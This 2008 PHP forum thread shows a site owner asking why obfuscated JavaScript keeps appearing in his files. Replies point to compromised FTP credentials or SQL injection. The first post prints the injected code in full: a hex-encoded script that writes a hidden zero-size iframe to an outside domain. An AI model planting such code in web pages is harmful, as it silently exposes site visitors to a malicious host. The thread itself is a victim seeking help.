arifsor Posted July 18, 2008 Share Posted July 18, 2008 Hi, I have made my site XSS proofed but still the following code is being embedded in my site var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, "")) Any Idea? is this the hosting server issue? Please help Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/ Share on other sites More sharing options...
awpti Posted July 18, 2008 Share Posted July 18, 2008 Included as in.. stuck inside of your actual files or your DB? Former: Your FTP is compromised (or server if you aren't on shared hosting). Latter: Your script(s) are vulnerable to SQL Injection attacks. Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-593165 Share on other sites More sharing options...
arifsor Posted July 18, 2008 Author Share Posted July 18, 2008 Included as in.. stuck inside of your actual files or your DB? Former: Your FTP is compromised (or server if you aren't on shared hosting). Latter: Your script(s) are vulnerable to SQL Injection attacks. This script is inside my actual file Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-593170 Share on other sites More sharing options...
unkwntech Posted July 18, 2008 Share Posted July 18, 2008 I noticed a repeating string in there: eiqpxekm I did a quick google for it and found someone running a forum with the same issue and another site that seems to be compromised.... I'm not sure what it is or what, if anything, it does. Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-593172 Share on other sites More sharing options...
arifsor Posted July 18, 2008 Author Share Posted July 18, 2008 anybody have any idea?? Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-593203 Share on other sites More sharing options...
awpti Posted July 18, 2008 Share Posted July 18, 2008 Yes. It means your FTP has been compromised. Change your FTP password (And username if possible) Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-593206 Share on other sites More sharing options...
arifsor Posted July 19, 2008 Author Share Posted July 19, 2008 Is this possible that someone can update my file which has 444 permission through XSS! following response from my server guy - including the JS file using the relative paths (ie. some/path/some.js) can be abused for XSS injections. Link to comment https://forums.phpfreaks.com/topic/115373-anonymous-javascript-code/#findComment-594095 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.